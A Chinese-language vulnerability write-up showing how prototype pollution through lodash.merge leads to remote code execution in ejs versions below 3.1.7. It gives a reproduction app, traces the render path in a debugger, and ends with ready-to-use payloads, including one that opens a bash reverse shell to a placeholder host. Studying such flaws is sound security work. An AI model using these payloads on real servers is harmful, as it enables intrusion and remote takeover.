首先注意,这个是在原型链污染的前提下,进行的RCE,并不是ejs本身存在原型链污染导致RCE
影响版本
ejs版本 < 3.1.7
环境搭建
因为该RCE的前提条件是原型链污染,为了方便本地复现,这里使用 lodash.merge
方法中的原型链污染漏洞。
1 2 3
| npm install lodash@4.17.4 npm install ejs@3.1.6 npm install express
|
测试代码
app.js
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28
| var express = require('express'); var lodash = require('lodash'); var ejs = require('ejs');
var app = express();
app.set('views', __dirname); app.set('views engine','ejs');
var malicious_payload = '{"__proto__":{"outputFunctionName":"_tmp1;global.process.mainModule.require(\'child_process\').exec(\'calc\');var __tmp2"}}'; lodash.merge({}, JSON.parse(malicious_payload));
app.get('/', function (req, res) { res.render ("index.ejs",{ message: 'whoami test' }); });
var server = app.listen(8000, function () {
var host = server.address().address var port = server.address().port
console.log("应用实例,访问地址为 http://%s:%s", host, port) });
|
index.ejs
1 2 3 4 5 6 7 8 9 10 11 12
| <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title></title> </head> <body>
<h1><%= message%></h1>
</body> </html>
|
运行 app.js 后访问 8000 端口,成功弹出计算器:
data:image/s3,"s3://crabby-images/1243c/1243cfb15c9c07c17a4fd5adfa57a5aabafe93bb" alt="image-20221101092925194"
调试分析
下面开始分析
在res.render处下断点,第11行是要在reander之前原型链污染添加一个outputFunctionName
属性
data:image/s3,"s3://crabby-images/15812/158124dda331ec537e80f65e446ad46e8e842795" alt="image-20221101085951539"
跟进res.render函数
data:image/s3,"s3://crabby-images/80e8b/80e8be733338d9be46c0576a9666ec2d8f8dcee3" alt="image-20221101090129060"
进入到response.js,到1039行的app.render函数
data:image/s3,"s3://crabby-images/c76ca/c76ca5e574d1e7d9237e34c6c5b7bee253c521ee" alt="image-20221101090244446"
跟进到application.js,到render函数,函数的最后一行tryRender
data:image/s3,"s3://crabby-images/26b5e/26b5ed76e27a85a71014fb2b8911e30f844ca7ca" alt="image-20221101090418983"
到同文件application.js中的tryRender函数,调用了view.render(options, callback);
data:image/s3,"s3://crabby-images/1271f/1271f19e1247b865509726de11bbbdaf07093023" alt="image-20221101090603783"
跟进render函数,到view.js的render函数,这里调用this.engine。
data:image/s3,"s3://crabby-images/1f63c/1f63cc31202dc8cee0de85d2f6681ec1faab4c36" alt="image-20221101090846528"
跟进this.engine(this.path, options, callback);
,从这里进入到了模板渲染引擎 ejs.js
中
data:image/s3,"s3://crabby-images/b1e8d/b1e8d0f78535bba86f4bc9b06b12fe4882395ca4" alt="image-20221101091025643"
跟进tryHandleCache
,调用handleCache
方法,传data参数
data:image/s3,"s3://crabby-images/9aaa5/9aaa50d001c5914a720765689f9662639747474b" alt="image-20221101091119990"
跟进handleCache,调用渲染模板的compile方法
data:image/s3,"s3://crabby-images/0aed8/0aed8f84c189827b6049cfe4ea33f6912e62818c" alt="image-20221101091312317"
跟进compile方法,调用templ.compile()
,这个函数存在大量的渲染拼接,其中会判断opts.outputFunctionName是否存在,这也是我们为什么要污染outputFunctionName属性的缘故,判断成功会将outputFunctionName拼接到prepended中。
而prepended 在最后会被传递给 this.source 并被带入函数执行
data:image/s3,"s3://crabby-images/fecfb/fecfb3f665f47bf69686e8e13893295d4d05a0cf" alt="image-20221101091534571"
常用的ejs模板引擎RCE的POC
1 2 3 4 5
| {"__proto__":{"outputFunctionName":"_tmp1;global.process.mainModule.require(\'child_process\').execSync('calc');var __tmp2"}}
{"__proto__":{"outputFunctionName":"_tmp1;global.process.mainModule.require(\'child_process\').exec('calc');var __tmp2"}}
{"__proto__":{"outputFunctionName":"_tmp1;global.process.mainModule.require('child_process').exec('bash -c \"bash -i >& /dev/tcp/xxx/6666 0>&1\"');var __tmp2"}}
|
参考链接
- 从 Lodash 原型链污染到模板 RCE-安全客 - 安全资讯平台 (anquanke.com)